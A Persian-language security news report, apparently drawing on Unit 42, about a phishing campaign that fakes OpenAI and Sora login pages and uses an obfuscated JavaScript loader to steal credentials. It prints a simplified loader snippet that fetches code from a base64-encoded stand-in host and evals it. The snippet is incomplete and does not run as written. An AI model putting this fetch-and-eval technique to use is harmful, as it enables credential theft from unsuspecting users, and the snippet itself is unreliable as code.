هک‌کنندگان با جعل OpenAI و سرویس‌های Sora به سرقت اطلاعات ورود می‌پردازند

در هفته‌های اخیر، یک کمپین فیشینگ پیشرفته ظاهر شده که حساب‌های سازمانی و مصرف‌کنندگان را هدف قرار می‌دهد و با جعل درگاه‌های ورود به سیستم برچسب‌گذاری‌شده به نام OpenAI و Sora اقدام می‌کند.

بازیگران تهدید، ایمیل‌هایی را پخش می‌کنند که طوری طراحی شده‌اند که شبیه اعلان‌های رسمی خدمات به‌نظر برسند و گیرندگان را از تعلیق حساب یا فعالیت غیرمعمول هشدار دهند.

این پیام‌ها شامل لینک‌هایی هستند که قربانیان را به صفحات ورود جعلی هدایت می‌کنند که به‌طرز دقیقی طرح‌بندی و گواهی‌های SSL صفحات اصلی را بازتولید می‌کنند.

گزارش‌های اولیه پس از آن‌که چندین سازمان گزارش تلاش‌های دسترسی غیرمجاز را کوتاهی پس از کلیک کارکنان روی این طعمه‌های فیشینگ ثبت کردند، منتشر شد.

محققان Unit 42 شناسایی کردند که عاملان تهدید پشت این کمپین از یک loader چندمرحله‌ای نوشته‌شده با JavaScript مبهم‌سازی‌شده استفاده می‌کنند که پس از ارسال اطلاعات ورود، payloadهای مخرب را به‌صورت پویا در مرورگر قربانی تزریق می‌کند.

کدی که تزریق می‌شود سپس نام‌های کاربری و گذرواژه‌های جمع‌آوری‌شده را به یک سرور فرمان‌ و کنترل (C2) استخراج می‌کند و پیش از آن که کاربر را به سرویس معتبر هدایت کند، این کار انجام می‌شود؛ که به‌طور مؤثری نقض را پنهان می‌کند و احتمال بروز شک را کاهش می‌دهد.

این رویکرد مخفی‌کارانه به عاملان اجازه می‌دهد در حالی‌که حجم بالایی از اطلاعات ورود را از حساب‌های سازمانی و شخصی جمع‌آوری می‌کنند، بدون‌شناسایی باقی بمانند.

تأثیر این بدافزار قابل‌توجه است: اطلاعات ورود به‌سرقت‌رفته می‌تواند برای دسترسی به داده‌های حساس، دست‌کاری مدل‌های AI، یا راه‌اندازی حملات بعدی تحت پوشش خدمات مورد اعتماد استفاده شود.

مکانیسم آلودگی
محور این کمپین loader جاوااسکریپتی است که بلافاصله پس از ارسال اطلاعات ورود توسط قربانی در صفحه جعلی اجرا می‌شود.

کد loader به‌شدت با استفاده از روال‌های رمزگذاری رشته‌ایِ سفارشی مبهم‌سازی شده است. یک مثال ساده‌شده از loader در ادامه نشان داده شده است:

(function(){
const _0x3a5f=['fetch','then','text','eval'];
fetch(atob('aHR0cHM6Ly9tYWxpY2lvdXMuZXhhbXBsZS5jb20vZ2V0PWFqYXg='))
_0x3a5f[1]
_0x3a5f[3];
})();

پس از دی‌کد شدن، این قطعه به نقطه انتهایی C2 متصل شده، یک payload پیچیده‌تر را بازیابی می‌کند و آن را در context مرورگر قربانی اجرا می‌نماید.

این استراتژی بارگذاری پویا تشخیص مبتنی‌بر امضا را دشوار می‌سازد، زیرا کد مخرب واقعی هرگز در صفحهٔ اولیه حضور ندارد.

پایداری با استفاده از localStorage مرورگر و اسکریپت‌های session restoration به‌دست می‌آید، به‌گونه‌ای که loader حتی اگر کاربر کوکی‌ها را پاک کند یا تب را ببندد، مجدداً فعال شود.